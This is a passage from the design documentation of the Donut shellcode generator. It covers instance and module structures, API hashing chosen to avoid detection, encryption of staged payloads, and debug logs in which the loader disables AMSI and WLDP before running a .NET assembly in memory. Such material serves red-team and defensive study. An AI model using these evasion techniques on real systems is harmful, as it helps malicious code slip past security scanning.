185 | <span style='color:#800080; '>}</span><span style='color:#800080; '>;</span> | |
186 | <span style='color:#004a43; '>      </span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>endif</span> | |
187 | <span style='color:#800080; '>}</span> api<span style='color:#800080; '>;</span> | |
188 | ||
189 | <span style='color:#696969; '>// everything from here is encrypted</span> | |
190 | <span style='color:#800000; font-weight:bold; '>int</span> api_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the 64-bit hashes of API required for instance to work</span> | |
191 | <span style='color:#800000; font-weight:bold; '>int</span> dll_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the number of DLL to load before resolving API</span> | |
192 | <span style='color:#800000; font-weight:bold; '>char</span> dll_name<span style='color:#808030; '>[</span>DONUT_MAX_DLL<span style='color:#808030; '>]</span><span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// a list of DLL strings to load</span> | |
193 | ||
194 | <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span> | |
195 | <span style='color:#800000; font-weight:bold; '>char</span> s<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// amsi.dll</span> | |
196 | uint32_t w<span style='color:#808030; '>[</span><span style='color:#008c00; '>2</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> | |
197 | <span style='color:#800080; '>}</span> amsi<span style='color:#800080; '>;</span> | |
198 | ||
199 | <span style='color:#800000; font-weight:bold; '>char</span> clr<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// clr.dll</span> | |
200 | <span style='color:#800000; font-weight:bold; '>char</span> wldp<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// wldp.dll</span> | |
201 | <span style='color:#800000; font-weight:bold; '>char</span> wldpQuery<span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WldpQueryDynamicCodeTrust</span> | |
202 | <span style='color:#800000; font-weight:bold; '>char</span> wldpIsApproved<span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WldpIsClassInApprovedList</span> | |
203 | ||
204 | <span style='color:#800000; font-weight:bold; '>char</span> amsiInit<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiInitialize</span> | |
205 | <span style='color:#800000; font-weight:bold; '>char</span> amsiScanBuf<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiScanBuffer</span> | |
206 | <span style='color:#800000; font-weight:bold; '>char</span> amsiScanStr<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiScanString</span> | |
207 | ||
208 | uint16_t wscript<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WScript</span> | |
209 | uint16_t wscript_exe<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// wscript.exe</span> | |
210 | ||
211 | <span style='color:#603000; '>GUID</span> xIID_IUnknown<span style='color:#800080; '>;</span> | |
212 | <span style='color:#603000; '>GUID</span> xIID_IDispatch<span style='color:#800080; '>;</span> | |
213 | ||
214 | <span style='color:#696969; '>// GUID required to load .NET assemblies</span> | |
215 | <span style='color:#603000; '>GUID</span> xCLSID_CLRMetaHost<span style='color:#800080; '>;</span> | |
216 | <span style='color:#603000; '>GUID</span> xIID_ICLRMetaHost<span style='color:#800080; '>;</span> | |
217 | <span style='color:#603000; '>GUID</span> xIID_ICLRRuntimeInfo<span style='color:#800080; '>;</span> | |
218 | <span style='color:#603000; '>GUID</span> xCLSID_CorRuntimeHost<span style='color:#800080; '>;</span> | |
219 | <span style='color:#603000; '>GUID</span> xIID_ICorRuntimeHost<span style='color:#800080; '>;</span> | |
220 | <span style='color:#603000; '>GUID</span> xIID_AppDomain<span style='color:#800080; '>;</span> | |
221 | ||
222 | <span style='color:#696969; '>// GUID required to run VBS and JS files</span> | |
223 | <span style='color:#603000; '>GUID</span> xCLSID_ScriptLanguage<span style='color:#800080; '>;</span> <span style='color:#696969; '>// vbs or js</span> | |
224 | <span style='color:#603000; '>GUID</span> xIID_IHost<span style='color:#800080; '>;</span> <span style='color:#696969; '>// wscript object</span> | |
225 | <span style='color:#603000; '>GUID</span> xIID_IActiveScript<span style='color:#800080; '>;</span> <span style='color:#696969; '>// engine</span> | |
226 | <span style='color:#603000; '>GUID</span> xIID_IActiveScriptSite<span style='color:#800080; '>;</span> <span style='color:#696969; '>// implementation</span> | |
227 | <span style='color:#603000; '>GUID</span> xIID_IActiveScriptParse32<span style='color:#800080; '>;</span> <span style='color:#696969; '>// parser</span> | |
228 | <span style='color:#603000; '>GUID</span> xIID_IActiveScriptParse64<span style='color:#800080; '>;</span> | |
229 | ||
230 | <span style='color:#696969; '>// GUID required to run XSL files</span> | |
231 | <span style='color:#603000; '>GUID</span> xCLSID_DOMDocument30<span style='color:#800080; '>;</span> | |
232 | <span style='color:#603000; '>GUID</span> xIID_IXMLDOMDocument<span style='color:#800080; '>;</span> | |
233 | <span style='color:#603000; '>GUID</span> xIID_IXMLDOMNode<span style='color:#800080; '>;</span> | |
234 | ||
235 | <span style='color:#800000; font-weight:bold; '>int</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL </span> | |
236 | ||
237 | <span style='color:#800000; font-weight:bold; '>struct</span> <span style='color:#800080; '>{</span> | |
238 | <span style='color:#800000; font-weight:bold; '>char</span> url<span style='color:#808030; '>[</span>DONUT_MAX_URL<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// staging server hosting donut module</span> | |
239 | <span style='color:#800000; font-weight:bold; '>char</span> req<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// just a buffer for "GET"</span> | |
240 | <span style='color:#800080; '>}</span> http<span style='color:#800080; '>;</span> | |
241 | ||
242 | uint8_t sig<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string to hash</span> | |
243 | uint64_t mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// to verify decryption ok</span> | |
244 | ||
245 | DONUT_CRYPT mod_key<span style='color:#800080; '>;</span> <span style='color:#696969; '>// used to decrypt module</span> | |
246 | uint64_t mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// total size of module</span> | |
247 | ||
248 | <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span> | |
249 | PDONUT_MODULE p<span style='color:#800080; '>;</span> <span style='color:#696969; '>// for URL</span> | |
250 | DONUT_MODULE x<span style='color:#800080; '>;</span> <span style='color:#696969; '>// for PIC</span> | |
251 | <span style='color:#800080; '>}</span> module<span style='color:#800080; '>;</span> | |
252 | <span style='color:#800080; '>}</span> DONUT_INSTANCE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_INSTANCE<span style='color:#800080; '>;</span> | |
253 | </pre> | |
254 | ||
255 | <h3>Module</h3> | |
256 | ||
257 | <p>Modules can be embedded in an <var>Instance</var> or stored on a remote HTTP server.</p> | |
258 | ||
259 | <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// everything required for a module goes in the following structure</span> | |
260 | <span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_MODULE <span style='color:#800080; '>{</span> | |
261 | <span style='color:#603000; '>DWORD</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// EXE, DLL, JS, VBS, XSL</span> | |
262 | <span style='color:#603000; '>WCHAR</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version for .NET EXE/DLL</span> | |
263 | <span style='color:#603000; '>WCHAR</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// domain name to use for .NET EXE/DLL</span> | |
264 | <span style='color:#603000; '>WCHAR</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace for .NET EXE/DLL</span> | |
265 | <span style='color:#603000; '>WCHAR</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to invoke for .NET DLL or api for unmanaged DLL</span> | |
266 | <span style='color:#603000; '>DWORD</span> param_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// number of parameters for DLL/EXE</span> | |
267 | <span style='color:#603000; '>WCHAR</span> param<span style='color:#808030; '>[</span>DONUT_MAX_PARAM<span style='color:#808030; '>]</span><span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters for DLL/EXE</span> | |
268 | <span style='color:#603000; '>CHAR</span> sig<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// random string to verify decryption</span> | |
269 | ULONG64 mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// to verify decryption was ok</span> | |
270 | ULONG64 len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of EXE/DLL/XSL/JS/VBS file</span> | |
271 | <span style='color:#603000; '>BYTE</span> data<span style='color:#808030; '>[</span><span style='color:#008c00; '>4</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// data of EXE/DLL/XSL/JS/VBS file</span> | |
272 | <span style='color:#800080; '>}</span> DONUT_MODULE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_MODULE<span style='color:#800080; '>;</span> | |
273 | </pre> | |
274 | ||
275 | <h3>API Hashing</h3> | |
276 | ||
277 | <p>A hash function called <em>Maru</em> is used to resolve the address of API at runtime. It uses a Davies-Meyer construction and the SPECK block cipher to derive a 64-bit hash from an API string. The padding is similar to what's used by MD4 and MD5 except only 32-bits of the string length are stored in the buffer instead of 64-bits. An initial value (IV) chosen randomly ensures the 64-bit API hashes are unique for each instance and cannot be used for detection of Donut. Future releases will likely support alternative methods of resolving address of API to decrease chance of detection.</p> | |
278 | ||
279 | <h3>Encryption</h3> | |
280 | ||
281 | <p>The following structure is used to hold a master key, counter and nonce for Donut, which are generated randomly.</p> | |
282 | ||
283 | <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CRYPT <span style='color:#800080; '>{</span> | |
284 | <span style='color:#603000; '>BYTE</span> mk<span style='color:#808030; '>[</span>DONUT_KEY_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// master key</span> | |
285 | <span style='color:#603000; '>BYTE</span> ctr<span style='color:#808030; '>[</span>DONUT_BLK_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// counter + nonce</span> | |
286 | <span style='color:#800080; '>}</span> DONUT_CRYPT<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CRYPT<span style='color:#800080; '>;</span> | |
287 | </pre> | |
288 | ||
289 | <p>Chaskey, a 128-bit block cipher with support for 128-bit keys, is used in Counter (CTR) mode to decrypt a <var>Module</var> or an <var>Instance</var> at runtime. If an adversary discovers a staging server, it should not be feasible for them to decrypt a donut module without the key which is stored in the donut payload. </p> | |
290 | ||
291 | <h3>Debugging payload</h3> | |
292 | ||
293 | <p>The payload is capable of displaying detailed information about each step executing a file in-memory and can be useful in tracking down bugs. To build a debug-enabled executable, specify the debug label with nmake/make for both donut.c and payload.c.</p> | |
294 | ||
295 | <pre> | |
296 | nmake debug -f Makefile.msvc | |
297 | make debug -f Makefile.mingw | |
298 | </pre> | |
299 | ||
300 | <p>Use donut to create a payload as you normally would and a file called <code>instance</code> will be saved to disk.</p> | |
301 | ||
302 | <pre> | |
303 | c:\hub\donut>donut -fClass1.dll -cTestClass -mRunProcess -pcalc.exe,notepad.exe | |
304 | ||
305 | [ Donut shellcode generator v0.9.2 | |
306 | [ Copyright (c) 2019 TheWover, Odzhan | |
307 | ||
308 | DEBUG: donut.c:822:DonutCreate(): Entering. | |
309 | DEBUG: donut.c:824:DonutCreate(): Validating configuration and path of file | |
310 | DEBUG: donut.c:840:DonutCreate(): Validating instance type | |
311 | DEBUG: donut.c:880:DonutCreate(): Validating architecture | |
312 | DEBUG: donut.c:277:get_file_info(): Entering. | |
313 | DEBUG: donut.c:286:get_file_info(): Checking extension of Class1.dll | |
314 | DEBUG: donut.c:293:get_file_info(): Extension is ".dll" | |
315 | DEBUG: donut.c:320:get_file_info(): Module is DLL | |
316 | DEBUG: donut.c:327:get_file_info(): Mapping Class1.dll into memory | |
317 | DEBUG: donut.c:222:map_file(): Reading size of file : Class1.dll | |
318 | DEBUG: donut.c:231:map_file(): Opening Class1.dll | |
319 | DEBUG: donut.c:241:map_file(): Mapping 3072 bytes for Class1.dll | |
320 | DEBUG: donut.c:336:get_file_info(): Checking DOS header | |
321 | DEBUG: donut.c:342:get_file_info(): Checking NT header | |
322 | DEBUG: donut.c:348:get_file_info(): Checking IMAGE_DATA_DIRECTORY | |
323 | DEBUG: donut.c:356:get_file_info(): Checking characteristics | |
324 | DEBUG: donut.c:368:get_file_info(): COM Directory found | |
325 | DEBUG: donut.c:384:get_file_info(): Runtime version : v4.0.30319 | |
326 | DEBUG: donut.c:395:get_file_info(): Leaving. | |
327 | DEBUG: donut.c:944:DonutCreate(): Creating module | |
328 | DEBUG: donut.c:516:CreateModule(): Entering. | |
329 | DEBUG: donut.c:520:CreateModule(): Allocating 9504 bytes of memory for DONUT_MODULE | |
330 | DEBUG: donut.c:544:CreateModule(): Domain : TPYTXT7T | |
331 | DEBUG: donut.c:549:CreateModule(): Class : TestClass | |
332 | DEBUG: donut.c:552:CreateModule(): Method : RunProcess | |
333 | DEBUG: donut.c:559:CreateModule(): Runtime : v4.0.30319 | |
334 | DEBUG: donut.c:584:CreateModule(): Adding "calc.exe" | |
335 | DEBUG: donut.c:584:CreateModule(): Adding "notepad.exe" | |
336 | DEBUG: donut.c:610:CreateModule(): Leaving. | |
337 | DEBUG: donut.c:951:DonutCreate(): Creating instance | |
338 | DEBUG: donut.c:621:CreateInstance(): Entering. | |
339 | DEBUG: donut.c:624:CreateInstance(): Allocating space for instance | |
340 | DEBUG: donut.c:631:CreateInstance(): The size of module is 9504 bytes. Adding to size of instance. | |
341 | DEBUG: donut.c:643:CreateInstance(): Generating random key for instance | |
342 | DEBUG: donut.c:649:CreateInstance(): Generating random key for module | |
343 | DEBUG: donut.c:655:CreateInstance(): Generating random string to verify decryption | |
344 | DEBUG: donut.c:661:CreateInstance(): Generating random IV for Maru hash | |
345 | DEBUG: donut.c:666:CreateInstance(): Generating hashes for API using IV: 59e4ea34bad26f10 | |
346 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : LoadLibraryA = 710C9DA8846AE821 | |
347 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetProcAddress = 2334B1630D3B9C85 | |
348 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetModuleHandleA = 5389E01382E0391 | |
349 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualAlloc = 51EE6B0DB215095E | |
350 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualFree = F55A2169F30A6ED4 | |
351 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualQuery = 22DB7628044F6E32 | |
352 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualProtect = 688AA07FEF250016 | |
353 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : Sleep = 5BF1C1B408CCA4A5 | |
354 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : MultiByteToWideChar = 438AD242BBBC755 | |
355 | DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetUserDefaultLCID = 33ED1B2C1A2F9EC7 | |
356 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreate = 78AD2BFB55A5E7ED | |
357 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreateVector = 539F6582DE26F7BC | |
358 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayPutElement = 5057AD641F749DA0 | |
359 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayDestroy = A63C510FF032080E | |
360 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetLBound = A37979CE2EEDDA6 | |
361 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetUBound = 64A9C62452B8653C | |
362 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysAllocString = BFEEAAB6CE6017FB | |
363 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysFreeString = E6FD34B03A2701F6 | |
364 | DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : LoadTypeLib = 2A33214873ADC58C | |
365 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCrackUrlA = 1ADE3553184C68E1 | |
366 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetOpenA = 1DEDE3D32F2FCD3 | |
367 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetConnectA = 781FD6B18C99CAD2 | |
368 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetSetOptionA = 13EC8A292778FC3F | |
369 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetReadFile = 8D16E60E7C2E582A | |
370 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCloseHandle = C28E8A3AABB2A755 | |
371 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpOpenRequestA = 6C5189610A8545F5 | |
372 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpSendRequestA = 4DFA0D985988D31 | |
373 | DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpQueryInfoA = ED09A37256B27F04 | |
374 | DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CorBindToRuntime = FD669FABED4C6B7 | |
375 | DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CLRCreateInstance = 56B7AC5C110570B5 | |
376 | DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoInitializeEx = 3733F4734D12D7C | |
377 | DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoCreateInstance = FCB3EAC51E43319B | |
378 | DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoUninitialize = 908A347B45C6E4A2 | |
379 | DEBUG: donut.c:694:CreateInstance(): Copying GUID structures and DLL strings for loading .NET assemblies | |
380 | DEBUG: donut.c:791:CreateInstance(): Copying module data to instance | |
381 | DEBUG: donut.c:796:CreateInstance(): encrypting instance | |
382 | DEBUG: donut.c:808:CreateInstance(): Leaving. | |
383 | DEBUG: donut.c:959:DonutCreate(): Saving instance to file | |
384 | DEBUG: donut.c:992:DonutCreate(): PIC size : 33050 | |
385 | DEBUG: donut.c:999:DonutCreate(): Inserting opcodes | |
386 | DEBUG: donut.c:1035:DonutCreate(): Copying 15218 bytes of x86 + amd64 shellcode | |
387 | DEBUG: donut.c:259:unmap_file(): Unmapping | |
388 | DEBUG: donut.c:262:unmap_file(): Closing | |
389 | DEBUG: donut.c:1061:DonutCreate(): Leaving. | |
390 | [ Instance type : PIC | |
391 | [ Module file : "Class1.dll" | |
392 | [ File type : .NET DLL | |
393 | [ Class : TestClass | |
394 | [ Method : RunProcess | |
395 | [ Parameters : calc.exe,notepad.exe | |
396 | [ Target CPU : x86+AMD64 | |
397 | [ Shellcode : "payload.bin" | |
398 | ||
399 | DEBUG: donut.c:1069:DonutDelete(): Entering. | |
400 | DEBUG: donut.c:1088:DonutDelete(): Leaving. | |
401 | </pre> | |
402 | ||
403 | <p>Pass the instance as a parameter to payload.exe and it will run on the host system as if in a target environment.</p> | |
404 | ||
405 | <pre> | |
406 | c:\hub\donut\payload>payload ..\instance | |
407 | Running... | |
408 | DEBUG: payload.c:45:ThreadProc(): Maru IV : 1899033E0863343E | |
409 | DEBUG: payload.c:48:ThreadProc(): Resolving address for VirtualAlloc() : 9280348A6A2AFA7 | |
410 | DEBUG: payload.c:52:ThreadProc(): Resolving address for VirtualAlloc() : 3A49032E4107D985 | |
411 | DEBUG: payload.c:61:ThreadProc(): VirtualAlloc : 77535ED0 VirtualFree : 77535EF0 | |
412 | DEBUG: payload.c:63:ThreadProc(): Allocating 17800 bytes of RW memory | |
413 | DEBUG: payload.c:70:ThreadProc(): Copying 17800 bytes of data to memory 008D0000 | |
414 | DEBUG: payload.c:74:ThreadProc(): Zero initializing PDONUT_ASSEMBLY | |
415 | DEBUG: payload.c:82:ThreadProc(): Decrypting 17800 bytes of instance | |
416 | DEBUG: payload.c:89:ThreadProc(): Generating hash to verify decryption | |
417 | DEBUG: payload.c:91:ThreadProc(): Instance : c16c69caa83fb13f | Result : c16c69caa83fb13f | |
418 | DEBUG: payload.c:98:ThreadProc(): Resolving LoadLibraryA | |
419 | DEBUG: payload.c:104:ThreadProc(): Loading ole32.dll ... | |
420 | DEBUG: payload.c:104:ThreadProc(): Loading oleaut32.dll ... | |
421 | DEBUG: payload.c:104:ThreadProc(): Loading wininet.dll ... | |
422 | DEBUG: payload.c:104:ThreadProc(): Loading mscoree.dll ... | |
423 | DEBUG: payload.c:108:ThreadProc(): Resolving 33 API | |
424 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 066A0ED9815D3C92 | |
425 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for F3569749C64E1DA5 | |
426 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09280348A6A2AFA7 | |
427 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3A49032E4107D985 | |
428 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for FDE50FEB629EB834 | |
429 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4A4C764EFA89A84F | |
430 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5D388BA18E017E53 | |
431 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4EA2B25D8FAABD2B | |
432 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for F1D278132E49F050 | |
433 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for D05386A0F8FF7CAD | |
434 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8121B63764A390A6 | |
435 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for EB2BFAA408124470 | |
436 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 11B666F77E7303F6 | |
437 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for E8BD6B7A99981E38 | |
438 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for DE78E211DE61998B | |
439 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09D967C5479A0F9F | |
440 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6CA1D167C2BFFA9A | |
441 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for AD11F6324A205C5E | |
442 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5EAEF345362A2811 | |
443 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for A0CC0DC36E8EDD2C | |
444 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for A4241EDCC8B14F85 | |
445 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 756CEB8FF481A72E | |
446 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8116A255193A09CA | |
447 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for AB14A786531404A1 | |
448 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 1CF4A93D6896380A | |
449 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 61B393CC2DE33733 | |
450 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for ADAF62D44179684A | |
451 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 7F9591B7380CD749 | |
452 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3CC76B29D676544F | |
453 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 725AA978FD2B1255 | |
454 | DEBUG: peb.c:87:FindExport(): 725aa978fd2b1255 is forwarded to api-ms-win-core-com-l1-1-0.CoInitializeEx | |
455 | DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll | |
456 | DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoInitializeEx) | |
457 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6C0F670F3C85A407 | |
458 | DEBUG: peb.c:87:FindExport(): 6c0f670f3c85a407 is forwarded to api-ms-win-core-com-l1-1-0.CoCreateInstance | |
459 | DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll | |
460 | DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoCreateInstance) | |
461 | DEBUG: payload.c:111:ThreadProc(): Resolving API address for 2996694CA69B44E8 | |
462 | DEBUG: peb.c:87:FindExport(): 2996694ca69b44e8 is forwarded to api-ms-win-core-com-l1-1-0.CoUninitialize | |
463 | DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll | |
464 | DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoUninitialize) | |
465 | DEBUG: payload.c:127:ThreadProc(): Using module embedded in instance | |
466 | DEBUG: inmem_dotnet.c:43:LoadAssembly(): Using module embedded in instance | |
467 | DEBUG: inmem_dotnet.c:51:LoadAssembly(): CLRCreateInstance | |
468 | DEBUG: inmem_dotnet.c:59:LoadAssembly(): ICLRMetaHost::GetRuntime("v4.0.30319") | |
469 | DEBUG: inmem_dotnet.c:66:LoadAssembly(): ICLRRuntimeInfo::IsLoadable | |
470 | DEBUG: inmem_dotnet.c:70:LoadAssembly(): ICLRRuntimeInfo::GetInterface | |
471 | DEBUG: inmem_dotnet.c:78:LoadAssembly(): HRESULT: 00000000 | |
472 | DEBUG: inmem_dotnet.c:100:LoadAssembly(): ICorRuntimeHost::Start | |
473 | DEBUG: inmem_dotnet.c:107:LoadAssembly(): ICorRuntimeHost::CreateDomain("TP7WFT9M") | |
474 | DEBUG: inmem_dotnet.c:115:LoadAssembly(): IUnknown::QueryInterface | |
475 | DEBUG: bypass.c:83:DisableAMSI(): Length of AmsiScanBuffer stub is 32 bytes. | |
476 | DEBUG: bypass.c:89:DisableAMSI(): Overwriting AmsiScanBuffer | |
477 | DEBUG: bypass.c:104:DisableAMSI(): Length of AmsiScanString stub is -16 bytes. | |
478 | DEBUG: inmem_dotnet.c:123:LoadAssembly(): DisableAMSI OK | |
479 | DEBUG: inmem_dotnet.c:127:LoadAssembly(): DisableWLDP OK | |
480 | DEBUG: inmem_dotnet.c:134:LoadAssembly(): Copying 3072 bytes of assembly to safe array | |
481 | DEBUG: inmem_dotnet.c:140:LoadAssembly(): AppDomain::Load_3 | |
482 | DEBUG: inmem_dotnet.c:147:LoadAssembly(): HRESULT : 00000000 | |
483 | DEBUG: inmem_dotnet.c:149:LoadAssembly(): Erasing assembly from memory | |
484 | DEBUG: inmem_dotnet.c:155:LoadAssembly(): SafeArrayDestroy | |
485 | DEBUG: inmem_dotnet.c:176:RunAssembly(): Using module embedded in instance | |
486 | DEBUG: inmem_dotnet.c:184:RunAssembly(): Type is DLL | |
487 | DEBUG: inmem_dotnet.c:255:RunAssembly(): SysAllocString("TestClass") | |
488 | DEBUG: inmem_dotnet.c:259:RunAssembly(): SysAllocString("RunProcess") | |
489 | DEBUG: inmem_dotnet.c:263:RunAssembly(): Assembly::GetType_2 | |
490 | DEBUG: inmem_dotnet.c:269:RunAssembly(): SafeArrayCreateVector(2 parameter(s)) | |
491 | DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "calc.exe" as parameter 1 | |
492 | DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "notepad.exe" as parameter 2 | |
493 | DEBUG: inmem_dotnet.c:292:RunAssembly(): Calling Type::InvokeMember_3 | |
494 | DEBUG: inmem_dotnet.c:306:RunAssembly(): Type::InvokeMember_3 : 00000000 : Success | |
495 | DEBUG: inmem_dotnet.c:323:FreeAssembly(): Type::Release | |
496 | DEBUG: inmem_dotnet.c:335:FreeAssembly(): Assembly::Release | |
497 | DEBUG: inmem_dotnet.c:341:FreeAssembly(): AppDomain::Release | |
